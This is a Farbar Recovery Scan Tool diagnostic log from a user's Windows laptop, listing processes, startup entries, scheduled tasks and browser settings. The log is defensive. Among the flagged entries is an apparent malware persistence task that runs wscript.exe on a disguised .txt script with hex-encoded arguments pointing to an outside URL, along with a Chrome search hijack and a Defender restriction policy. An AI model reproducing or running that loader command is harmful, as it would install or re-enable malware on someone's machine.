Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-04-2020 Ran by zabol (administrator) on ZABOL-VAIO (Sony Corporation VPCEJ2B1E) (26-04-2020 17:25:31) Running from C:\Users\zabol\Downloads Loaded Profiles: zabol (Available Profiles: zabol & DefaultAppPool) Platform: Windows 10 Home Version 1803 17134.1130 (X64) Language: English (United States) Default browser: FF Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint\ApMsgFwd.exe (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint\ApntEx.exe (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint\Apoint.exe (Alps Electric Co., LTD. -> ALPS) C:\Program Files\Apoint\Apvfb.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Atheros Communications Inc. -> Atheros) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe (Byte Technologies LLC -> Byte Technologies LLC) C:\Program Files\ByteFence\ByteFence.exe (Byte Technologies LLC -> Byte Technologies LLC) C:\Program Files\ByteFence\ByteFenceService.exe (Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe (Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe (Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe (McAfee, LLC -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <2> (McAfee, LLC. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_20_1\mcapexe.exe (McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\CSP\3.4.105.0\McCSPServiceHost.exe (McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe (McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe (McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe (McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (McAfee, LLC. -> McAfee, LLC.) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe (Microsoft Corporation -> Microsoft Corporation) C:\Users\zabol\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mqsvc.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe <3> (Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <6> (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2> (Realsil Microelectronics Inc.) [File not signed] C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe (Sony Corporation -> Sony Corporation) C:\Program Files (x86)\Sony\VAIO Event Service\VESMgr.exe (Sony Corporation -> Sony Corporation) C:\Program Files (x86)\Sony\VAIO Event Service\VESMgrSub.exe <2> ==================== Registry (Whitelisted) =================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation) HKLM\...\Run: [Apoint] => C:\Program Files\Apoint\Apoint.exe [226672 2011-02-17] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [518784 2011-03-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.) HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [657568 2011-04-29] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-12-06] (Apple Inc. -> Apple Inc.) HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3942864 2016-10-13] (Logitech -> Logitech, Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4557504 2016-10-06] (Disc Soft Ltd -> Disc Soft Ltd) HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] -> GroupPolicy: Restriction ? <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {01CAF3D4-8E43-4958-A768-E9FF0CF046EF} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementUploader => C:\Program Files\Sony\VAIO Improvement\viuploader.exe Task: {0200703F-7396-4242-86E4-58091A0392EE} - System32\Tasks\Sony Corporation\VAIO Smart Network\VSN Logon Start => C:\Program Files\Sony\VAIO Smart Network\VSNClient [Argument = /Start] Task: {0219AC5C-B0ED-45FB-AF46-8850F781015B} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {02F49418-B3A9-452A-BCBE-1AA7EB12FCE5} - \SONY\VAIO Gate\VAIO Gate -> No File <==== ATTENTION Task: {05DB183F-C721-4B6F-8F0C-87659E5C70D3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {0B71105C-3270-4CBF-845C-88E4A355D89B} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {0C9A0B32-1DCA-4EDA-95D4-DD083424BA9F} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} Task: {0CB8FE39-535B-45AF-8B85-17FD4A7B7D91} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe Task: {17065E3C-06AC-4751-B272-4B3019DB890E} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_30_0_0_154_Plugin.exe [1449472 2018-09-08] (Adobe Systems Incorporated -> Adobe Systems Incorporated) Task: {19EECBB3-A85A-4A7B-B976-52B302333E5F} - System32\Tasks\Sony Corporation\VAIO Care\VCOneClick => C:\Program Files\Sony\VAIO Care\VCOneClick.exe Task: {1E645D37-77CB-4557-9418-F9EA27251D99} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe Task: {1F434C6C-9E5E-4C0B-8A71-D40255EA97FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {2FAB8529-D615-443C-B84B-A1E93AC3BDE0} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [126152 2020-04-03] (Mozilla Corporation -> Mozilla Foundation) Task: {31F56731-5718-41BA-82DB-27756712BC73} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [3939808 2020-02-17] (Byte Technologies LLC -> Byte Technologies LLC) <==== ATTENTION "C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" was unlocked. <==== ATTENTION Task: {35C362A3-2D12-434F-9E5E-B25B3380550F} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [1072312 2020-02-04] (McAfee, LLC. -> McAfee, LLC.) Task: {377745E9-F39A-4FFB-BD21-8D3A8EFC1A3D} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe Task: {3EACF46F-CC6B-4D60-8AA0-8A32D5326A51} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316} Task: {3FC7F099-D23D-4084-BB49-0D3008E3B872} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {476EFF4C-5924-4961-A231-B04E0EF7AF9D} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1} Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsMigration => {343D770D-7788-47C2-B62A-B7C4CED925CB} Task: {4899A258-1C7F-45E9-B36E-4489E0B476FC} - System32\Tasks\Microsoft\Windows\rempl\shell-usoscan => C:\Program Files\rempl\remsh.exe Task: {49FAEB70-4A78-48E6-AAD3-DDF180EEE598} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\WINDOWS\system32\MRT.exe [121542864 2020-04-20] (Microsoft Windows -> Microsoft Corporation) Task: {4A49469C-C781-4449-8F22-C80220DDE295} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe Task: {4B266040-855A-4AF4-BC15-5CC8063AFC64} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe Task: {4D387907-789D-40A1-8843-A2E1D72EA37B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {51554FBC-4F45-4570-B883-1E2D965AE8A1} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe [4552120 2020-01-06] (McAfee, LLC -> McAfee, LLC.) Task: {577ED758-0608-451A-9BCE-13F72D17EEAF} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe Task: {5845B7D6-2F83-4D17-BD1F-577A43A2F626} - System32\Tasks\Sony Corporation\VAIO Care\VAIO Care => C:\Program Files\Sony\VAIO Care\VCsystray.exe Task: {5B2FFA78-692B-45C9-B04D-5C4ABEFE0F43} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControls => {DFA14C43-F385-4170-99CC-1B7765FA0E4A} Task: {606DE82D-710B-4BC2-A9A9-0A11C9E81AAE} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe Task: {66BF628C-693A-47F3-924C-89D76AC0073D} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd) Task: {688FF4F3-E869-4F93-8439-D74F0372E87E} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [761424 2020-02-05] (McAfee, LLC. -> McAfee, LLC.) Task: {75357ED9-28F8-4B17-B026-DDC9985D375E} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe Task: {769788B7-BB7A-4D30-8AC3-7B246ADC2607} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {85509B6D-B93A-4B5A-9818-4417DD34CEE1} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {8759E6A5-A1AE-4C1B-8760-FD332C3A75FC} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION Task: {8A5EF49E-B35C-4217-BBDE-465D8C3E1D8D} - System32\Tasks\Yahoo! Powered norel => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{2BB5EED6-A1F7-6410-2731-FA52BD73719C}\tofo.txt" "68747470733a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b32424235454544362d413146372d363431302d323733312d4641353242443733373139437d5c66696c656661" "433a5c50726f6772616d446174615c7b32424235454544362d413146372d363431302d3237 (the data entry has 80 more characters). <==== ATTENTION Task: {8BC9CC01-7AAD-4276-BE47-3CADB5E14E87} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.4.134\DADUpdater.exe [4147336 2020-03-20] (McAfee, Inc. -> McAfee, LLC) Task: {8CA07F8A-CF6B-41DD-974F-C761E0E86D16} - System32\Tasks\McAfee\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.9.577\mcdatrep.exe [1826656 2020-04-20] (McAfee, Inc. -> McAfee, LLC.) Task: {8D5112D6-4C1C-4E51-A724-1BC87D0C7694} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update 5 => C:\Program Files\Sony\VAIO Update 5\VAIOUpdt.exe Task: {9081B71D-FFEA-4FFF-A02F-71C6442ED2FF} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {95C346C1-5879-4AE1-971A-42B814935049} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {983E9318-AF05-451C-9A77-79D4D173EEAF} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1} Task: {9CEFDE0B-B339-4DC1-B65D-CACA7E9309B4} - System32\Tasks\Sony Corporation\VAIO Improvement Validation\VAIO Improvement Validation => C:\Program Files\Sony\VAIO Improvement Validation\viv.exe [208224 2011-01-20] (Sony Corporation -> Sony Corporation) Task: {A15965F1-3D73-4527-AEDD-C9A07E5556BE} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe Task: {A1F74446-09AE-481F-9864-111BEC127F03} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18227896 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd) Task: {A42671E7-69C2-4F73-B967-2245424E4483} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {A4B23938-4004-4694-89F7-E61243BB65DB} - \SONY\VAIO Gate\StartExecuteProxy -> No File <==== ATTENTION Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371} Task: {B50B7033-7B29-4D05-A575-5E8119742796} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe Task: {BB26D8E7-F4CA-4DD3-B841-D57F54CD391F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe Task: {C31999AF-9F75-45BA-820D-4ADA3918AA32} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969} Task: {C38B21A7-9410-42C9-BB35-84E86CAAAB3F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {CA3CA04B-9C5A-4BE1-88F5-91351E8E6314} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61} Task: {CC710CBA-DBAE-4476-BC02-0F4B91C479DB} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {CD83250B-7F86-4DF6-B4C6-4709B4B5AF22} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [569416 2016-02-23] (Apple Inc. -> Apple Inc.) Task: {CE119A72-BF94-4E49-83FC-92F583E0E4E4} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION Task: {CE6B8B9D-DCD1-469D-A539-256F142D67FE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {D1EFF40B-842A-41C0-9890-40157AD72B4E} - System32\Tasks\{C2BE6EEA-2151-49FA-B991-9DF0B78927B9} => C:\WINDOWS\system32\pcalua.exe -a C:\Users\zabol\AppData\Local\{42F774AB-665F-1813-0BC7-3DFB2FAFC163}\uninst.exe -c -P=/Uninstall /s /noun /DelSelfDir Task: {D321CDCE-7C9F-40BD-B9CF-C68F0BA0D380} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe Task: {D978EF7A-7A03-4D53-A851-A731FDF11E26} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation) Task: {DBFF1597-4C7D-4E9D-ADAF-AF19CBCD52B3} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe Task: {E773AC1F-515F-4EA2-B982-A7C6C2AEBD96} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {E9BBD3E0-6993-41F2-ABDE-87A628D8DF1E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {F4B84655-0ECE-46B3-9277-7D8DF47016CF} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {FF6789A4-FDDD-485D-A5CC-B10DA94F0C53} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [1072312 2020-02-04] (McAfee, LLC. -> McAfee, LLC.) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\Yahoo! Powered norel.job => Wscript.exe C:\ProgramData\{2BB5EED6-A1F7-6410-2731-FA52BD73719C}\tofo.txt <==== ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{72c231dd-7624-4efc-ab06-689daaa0c895}: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{7c4b93f2-72eb-4fe0-830e-a9a788862a0c}: [DhcpNameServer] 192.168.0.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.uk/ HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://vaioportal.sony.eu HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxps://www.google.co.uk/ URLSearchHook: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 - (No Name) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - No File SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SNYEDF&pc=MASE&src=IE-SearchBox SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SNYEDF&pc=MASE&src=IE-SearchBox SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SNYEDF&pc=MASE&src=IE-SearchBox SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> {9E2D726D-83A3-4DA3-84F9-2189EDE14402} URL = hxxp://services.zinio.com/search?s={searchTerms}&rf=sonyslices SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> {A642BFE8-A124-45B7-9619-05FE0DB1C4A7} URL = hxxp://rover.ebay.com/rover/1/710-42480-16445-33/4?mpre=hxxp://shop.ebay.co.uk/?oemInLn=ieSrch-Q311&_nkw={searchTerms} BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2020-04-26] (McAfee, LLC -> McAfee, LLC) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2016-03-21] (Sun Microsystems, Inc. -> Sun Microsystems, Inc.) BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-04-29] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed] BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2020-04-26] (McAfee, LLC -> McAfee, LLC) BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll [2016-03-21] (Sun Microsystems, Inc. -> Sun Microsystems, Inc.) Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation) Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2020-02-05] (McAfee, LLC. -> McAfee, LLC.) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2020-02-05] (McAfee, LLC. -> McAfee, LLC.) FireFox: ======== FF DefaultProfile: s3btr4yb.default-1587910666053 FF ProfilePath: C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053 [2020-04-26] FF Extension: (Polski Language Pack) - C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053\Extensions\langpack-pl@firefox.mozilla.org.xpi [2020-04-26] FF Extension: (Polish Spellchecker Dictionary) - C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053\Extensions\pl@dictionaries.addons.mozilla.org.xpi [2020-04-26] FF Extension: (uBlock Origin) - C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053\Extensions\uBlock0@raymondhill.net.xpi [2020-04-26] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll [2018-09-08] (Adobe Systems Incorporated -> ) FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll [2016-03-21] (Sun Microsystems, Inc.) [File not signed] FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2020-02-05] (McAfee, LLC. -> ) FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN -> VideoLAN) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll [2018-09-08] (Adobe Systems Incorporated -> ) FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll [2016-03-21] (Sun Microsystems, Inc.) [File not signed] FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2020-02-05] (McAfee, LLC. -> ) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems, Incorporated -> Adobe Systems Inc.) Chrome: ======= CHR Profile: C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default [2020-04-26] CHR StartupUrls: Default -> "hxxps://www.google.com/" CHR DefaultSearchURL: Default -> hxxp://srchbar.com/?q={searchTerms} CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms} CHR Extension: (Slides) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek 